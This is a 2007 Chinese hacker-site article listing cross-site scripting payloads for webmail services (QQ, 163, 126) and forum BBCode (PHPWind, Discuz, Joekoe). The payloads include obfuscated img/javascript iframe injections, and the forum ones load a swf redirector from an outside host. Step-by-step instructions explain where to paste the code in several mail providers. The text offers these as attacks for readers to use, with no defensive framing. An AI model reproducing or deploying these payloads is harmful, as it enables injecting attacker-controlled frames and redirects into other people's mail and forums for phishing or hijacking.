黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 文章正文
[推荐]邮箱的内嵌式框架跨站漏洞
        ★★★★★
邮箱的内嵌式框架跨站漏洞
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-8-25
QQ邮箱:
  <img src=document.write('<Iframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe%3E')>
  利用方法:"写信"—点击"显示工具条"—"<HTML>",输入跨站代码即可。
  
  163邮箱:
  <img src=j avascript:document.write('%3CIframe%20src=输入你要跨的地址%20width=500%20height=550%3E%3C/iframe%3E')>
  利用方法:编辑源码处打上勾,输入跨站代码即可。
  
  126邮箱(同时也适用于QQ邮箱):
  <img src=javascri& #x70t:document.write('& #x3cIframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe% 3E')>
  利用方法:编辑源码处打上勾,输入跨站代码即可。
  
  21cn邮箱:
  利用方法:风格设为为"左右"—"写信"—"插入图片",在弹出的框里输入跨站代码即可。
  
  新浪邮箱:
  利用方法:"写信"—"插入图片",在弹出的框里输入跨站代码即可。
  
  TOM邮箱:
  利用方法:"写信"—"编辑HTML信件",再勾选上"编辑源码",输入跨站代码即可。
  
  Sohu邮箱:
  利用方法:直接发送即可,但要回复才能看见效果。
  
  同时还适合于更多邮箱
  
  BBS的直接跨站漏洞(swf跳转)——
  
  PHPWind论坛的跨站代码: [wmv]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/wmv]
  
  Discuz论坛的跨站代码: [flash]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/flash]

Joekoe论坛的跨站代码: [QT=450,350]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/QT]
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886